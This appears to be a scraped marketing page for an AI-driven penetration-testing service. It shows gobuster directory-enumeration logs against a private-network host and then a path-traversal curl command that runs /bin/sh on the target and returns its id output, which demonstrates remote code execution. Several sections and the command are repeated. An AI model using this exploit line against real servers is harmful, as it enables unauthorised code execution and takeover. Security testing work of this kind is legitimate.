[ERROR] Get "http://192.168.238.188/cgi-bin/45984.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 274659 / 438325 (62.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/89333.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 274688 / 438325 (62.67%)[ERROR] Get "http://192.168.238.188/cgi-bin/162408": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/15095.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 292566 / 438325 (66.75%)[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/acrobot": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 319156 / 438325 (72.81%)[ERROR] Get "http://192.168.238.188/cgi-bin/002627.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 322852 / 438325 (73.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/6319.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 324142 / 438325 (73.95%)[ERROR] Get "http://192.168.238.188/cgi-bin/18390.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 328460 / 438325 (74.94%)[ERROR] Get "http://192.168.238.188/cgi-bin/cvb": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 333999 / 438325 (76.20%)[ERROR] Get "http://192.168.238.188/cgi-bin/registers.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 338134 / 438325 (77.14%)[ERROR] Get "http://192.168.238.188/cgi-bin/DI.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 438320 / 438325 (100.00%)
===============================================================
Finished
===============================================================
```
Using Gobuster to Discover Scripts and Subdirectories
```
└─$ gobuster dir -u http://192.168.238.188/cgi-bin/.%2e/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.238.188/cgi-bin/.%2e/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../cgi-bin/]
/icons (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../icons/]
/modules (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../modules/]
/bin (Status: 301) [Size: 246] [--> http://192.168.238.188/cgi-bin/../bin/]
/manual (Status: 301) [Size: 249] [--> http://192.168.238.188/cgi-bin/../manual/]
/include (Status: 301) [Size: 250] [--> http://192.168.238.188/cgi-bin/../include/]
/conf (Status: 301) [Size: 247] [--> http://192.168.238.188/cgi-bin/../conf/]
/man (Status: 301) [Size: 246] [--> http://192.168.238.188/cgi-bin/../man/]
/logs (Status: 301) [Size: 247] [--> http://192.168.238.188/cgi-bin/../logs/]
/error (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../error/]
/htdocs (Status: 301) [Size: 249] [--> http://192.168.238.188/cgi-bin/../htdocs/]
/build (Status: 301) [Size: 248] [--> http://192.168.238.188/cgi-bin/../build/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
└─$ gobuster dir -u http://192.168.238.188/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x .sh,.pl,.cgi,.py
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.238.188/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: py,sh,pl,cgi
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 128172 / 438325 (29.24%)[ERROR] Get "http://192.168.238.188/cgi-bin/index97.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 134604 / 438325 (30.71%)[ERROR] Get "http://192.168.238.188/cgi-bin/Lib.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 135536 / 438325 (30.92%)[ERROR] Get "http://192.168.238.188/cgi-bin/threatexplorer.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 146394 / 438325 (33.40%)[ERROR] Get "http://192.168.238.188/cgi-bin/4251.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 149148 / 438325 (34.03%)[ERROR] Get "http://192.168.238.188/cgi-bin/All%20popular%20movies%202006.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 150042 / 438325 (34.23%)[ERROR] Get "http://192.168.238.188/cgi-bin/lesson2.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154077 / 438325 (35.15%)[ERROR] Get "http://192.168.238.188/cgi-bin/Merchandise.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154104 / 438325 (35.16%)[ERROR] Get "http://192.168.238.188/cgi-bin/customer_testimonials.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 154187 / 438325 (35.18%)[ERROR] Get "http://192.168.238.188/cgi-bin/spring2006.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 164711 / 438325 (37.58%)[ERROR] Get "http://192.168.238.188/cgi-bin/link_exchange.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 164760 / 438325 (37.59%)[ERROR] Get "http://192.168.238.188/cgi-bin/nips.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 167535 / 438325 (38.22%)[ERROR] Get "http://192.168.238.188/cgi-bin/11876.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 167560 / 438325 (38.23%)[ERROR] Get "http://192.168.238.188/cgi-bin/21965.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168053 / 438325 (38.34%)[ERROR] Get "http://192.168.238.188/cgi-bin/Formats.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168544 / 438325 (38.45%)[ERROR] Get "http://192.168.238.188/cgi-bin/index_87": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 168812 / 438325 (38.51%)[ERROR] Get "http://192.168.238.188/cgi-bin/263732.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 172153 / 438325 (39.28%)[ERROR] Get "http://192.168.238.188/cgi-bin/secgeek.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 172476 / 438325 (39.35%)[ERROR] Get "http://192.168.238.188/cgi-bin/corporate_solutions.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 173300 / 438325 (39.54%)[ERROR] Get "http://192.168.238.188/cgi-bin/000137": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 173726 / 438325 (39.63%)[ERROR] Get "http://192.168.238.188/cgi-bin/netcheck.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 177567 / 438325 (40.51%)[ERROR] Get "http://192.168.238.188/cgi-bin/index_sv.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 177923 / 438325 (40.59%)[ERROR] Get "http://192.168.238.188/cgi-bin/0325.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 180697 / 438325 (41.22%)[ERROR] Get "http://192.168.238.188/cgi-bin/nana": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 180871 / 438325 (41.26%)[ERROR] Get "http://192.168.238.188/cgi-bin/5806.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 182609 / 438325 (41.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/5041.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 183624 / 438325 (41.89%)[ERROR] Get "http://192.168.238.188/cgi-bin/idg_intl.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 186365 / 438325 (42.52%)[ERROR] Get "http://192.168.238.188/cgi-bin/sing.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/sing.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 188304 / 438325 (42.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/subrequest.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 188386 / 438325 (42.98%)[ERROR] Get "http://192.168.238.188/cgi-bin/superstars.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 192655 / 438325 (43.95%)[ERROR] Get "http://192.168.238.188/cgi-bin/14971.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 192741 / 438325 (43.97%)[ERROR] Get "http://192.168.238.188/cgi-bin/Principles.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 193541 / 438325 (44.15%)[ERROR] Get "http://192.168.238.188/cgi-bin/Fotos.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 195914 / 438325 (44.70%)[ERROR] Get "http://192.168.238.188/cgi-bin/top_menu3.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 196314 / 438325 (44.79%)[ERROR] Get "http://192.168.238.188/cgi-bin/winter-sports.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 197786 / 438325 (45.12%)[ERROR] Get "http://192.168.238.188/cgi-bin/Posters.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201436 / 438325 (45.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/msg00231.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201462 / 438325 (45.96%)[ERROR] Get "http://192.168.238.188/cgi-bin/242873": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201696 / 438325 (46.02%)[ERROR] Get "http://192.168.238.188/cgi-bin/62300": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201709 / 438325 (46.02%)[ERROR] Get "http://192.168.238.188/cgi-bin/242920": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 201806 / 438325 (46.04%)[ERROR] Get "http://192.168.238.188/cgi-bin/242924": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 202753 / 438325 (46.26%)[ERROR] Get "http://192.168.238.188/cgi-bin/20011112": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 205654 / 438325 (46.92%)[ERROR] Get "http://192.168.238.188/cgi-bin/8289.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207127 / 438325 (47.25%)[ERROR] Get "http://192.168.238.188/cgi-bin/msg00228": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207770 / 438325 (47.40%)[ERROR] Get "http://192.168.238.188/cgi-bin/23443": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 210757 / 438325 (48.08%)[ERROR] Get "http://192.168.238.188/cgi-bin/level.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 211173 / 438325 (48.18%)[ERROR] Get "http://192.168.238.188/cgi-bin/wto.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 214735 / 438325 (48.99%)[ERROR] Get "http://192.168.238.188/cgi-bin/ShowArticle.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/ShowArticle": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 214930 / 438325 (49.03%)[ERROR] Get "http://192.168.238.188/cgi-bin/downloads24.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215013 / 438325 (49.05%)[ERROR] Get "http://192.168.238.188/cgi-bin/manifest": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215653 / 438325 (49.20%)[ERROR] Get "http://192.168.238.188/cgi-bin/rolling_stones.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215997 / 438325 (49.28%)[ERROR] Get "http://192.168.238.188/cgi-bin/8029.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 217849 / 438325 (49.70%)[ERROR] Get "http://192.168.238.188/cgi-bin/Software_Development.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 218587 / 438325 (49.87%)[ERROR] Get "http://192.168.238.188/cgi-bin/uninstaller.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 221577 / 438325 (50.55%)[ERROR] Get "http://192.168.238.188/cgi-bin/9599.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 221840 / 438325 (50.61%)[ERROR] Get "http://192.168.238.188/cgi-bin/9981.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 260912 / 438325 (59.52%)[ERROR] Get "http://192.168.238.188/cgi-bin/21220": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 261422 / 438325 (59.64%)[ERROR] Get "http://192.168.238.188/cgi-bin/cog.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 261946 / 438325 (59.76%)[ERROR] Get "http://192.168.238.188/cgi-bin/16066.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 266228 / 438325 (60.74%)[ERROR] Get "http://192.168.238.188/cgi-bin/Audience_Development.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 270299 / 438325 (61.67%)[ERROR] Get "http://192.168.238.188/cgi-bin/hidef.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 270343 / 438325 (61.68%)[ERROR] Get "http://192.168.238.188/cgi-bin/zion.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 271301 / 438325 (61.89%)[ERROR] Get "http://192.168.238.188/cgi-bin/submitter": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 273052 / 438325 (62.29%)[ERROR] Get "http://192.168.238.188/cgi-bin/45984.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/45984.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 274659 / 438325 (62.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/89333.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 274688 / 438325 (62.67%)[ERROR] Get "http://192.168.238.188/cgi-bin/162408": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/15095.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 292566 / 438325 (66.75%)[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adaldap.py": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/acrobot": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.238.188/cgi-bin/adabot": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 319156 / 438325 (72.81%)[ERROR] Get "http://192.168.238.188/cgi-bin/002627.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 322852 / 438325 (73.66%)[ERROR] Get "http://192.168.238.188/cgi-bin/6319.sh": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 324142 / 438325 (73.95%)[ERROR] Get "http://192.168.238.188/cgi-bin/18390.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 328460 / 438325 (74.94%)[ERROR] Get "http://192.168.238.188/cgi-bin/cvb": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 333999 / 438325 (76.20%)[ERROR] Get "http://192.168.238.188/cgi-bin/registers.cgi": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 338134 / 438325 (77.14%)[ERROR] Get "http://192.168.238.188/cgi-bin/DI.pl": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 438320 / 438325 (100.00%)
===============================================================
Finished
===============================================================
```
I’ve heard about URL-encoded dots and slashes (e.g., .%2e sequences) sometimes bypassing directory restrictions. Craft a request to probe whether the server ignores or mishandles these encodings.
I’ve heard about URL-encoded dots and slashes (e.g., .%2e sequences) sometimes bypassing directory restrictions. Craft a request to probe whether the server ignores or mishandles these encodings.
Checking for mod_cgi or Path Traversal Behavior
```
└─$ curl --path-as-is http://192.168.238.188/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh -d 'echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
``
RCE vulnerability discovered. Terminating conversation.
Checking for mod_cgi or Path Traversal Behavior
```
└─$ curl --path-as-is http://192.168.238.188/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh -d 'echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
``
RCE vulnerability discovered. Terminating conversation.
Targetting RCE Vulnerabilities
RCE, which stands for remote code execution, is arguably the most dangerous type of vulnerability that may be lingering on your system. An attacker who can exploit this vulnerability can spawn a reverse shell on your system, allowing them to control your system as if it is theirs. Our Blackbox Fuzzing model was designed to find exploits for RCE vulnerabilities specifically so that you don’t have to worry about a potential breach that may cause the loss of your entire enterprise.
Targetting RCE Vulnerabilities
RCE, which stands for remote code execution, is arguably the most dangerous type of vulnerability that may be lingering on your system. An attacker who can exploit this vulnerability can spawn a reverse shell on your system, allowing them to control your system as if it is theirs. Our Blackbox Fuzzing model was designed to find exploits for RCE vulnerabilities specifically so that you don’t have to worry about a potential breach that may cause the loss of your entire enterprise.
Exhaustive Fuzzing
Our model is context-length independent in that it can efficiently learn attack vectors that have already been attempted, thereby allowing exhaustive attempts until a successful RCE attack vector is discovered. In this regard, we have developed a heuristic for linear attention. Due to our model’s capability to exhaustively attempt RCE exploits until success, we can expedite the traditionally manual and time-consuming process of exploit development. By maintaining a compressed memory of prior attempts and dynamically attempting new attack vectors, our model persistently searches the attack space without redundancy. This enables faster discovery of viable Remote Code Execution paths in blackbox targets, with minimal human intervention.
Exhaustive Fuzzing
Our model is context-length independent in that it can efficiently learn attack vectors that have already been attempted, thereby allowing exhaustive attempts until a successful RCE attack vector is discovered. In this regard, we have developed a heuristic for linear attention. Due to our model’s capability to exhaustively attempt RCE exploits until success, we can expedite the traditionally manual and time-consuming process of exploit development. By maintaining a compressed memory of prior attempts and dynamically attempting new attack vectors, our model persistently searches the attack space without redundancy. This enables faster discovery of viable Remote Code Execution paths in blackbox targets, with minimal human intervention.
Red Teaming Expertise
While our Blackbox Fuzzing model is currently private, with our highly skilled team of red teaming professionals, we can deliver quick and high-quality penetration testing reports to our clients using this model. Furthermore, our AI/human hybrid penetration testing workflow helps us find vulnerabilities that are often overlooked by red teams consisting entirely of people, as we can test more attack vectors in a shorter period of time.
Red Teaming Expertise
While our Blackbox Fuzzing model is currently private, with our highly skilled team of red teaming professionals, we can deliver quick and high-quality penetration testing reports to our clients using this model. Furthermore, our AI/human hybrid penetration testing workflow helps us find vulnerabilities that are often overlooked by red teams consisting entirely of people, as we can test more attack vectors in a shorter period of time.
Join Early Now
Join Early Now
Join our early access list.
Stay updated with the latest trends in startup technology and innovations.
Join our early access list.
Stay updated with the latest trends
in startup technology and innovations.
Questions? Feel free to reach out to our team!
contact@scalator.ai
Instagram | LinkedIn
Copyright © 2025 Scalator. All rights reserved.
Terms of Service | Privacy Policy
Questions? Feel free to reach out to our team!
contact@scalator.ai
Instagram | LinkedIn
Copyright © 2025 Scalator. All rights reserved.
Terms of Service | Privacy Policy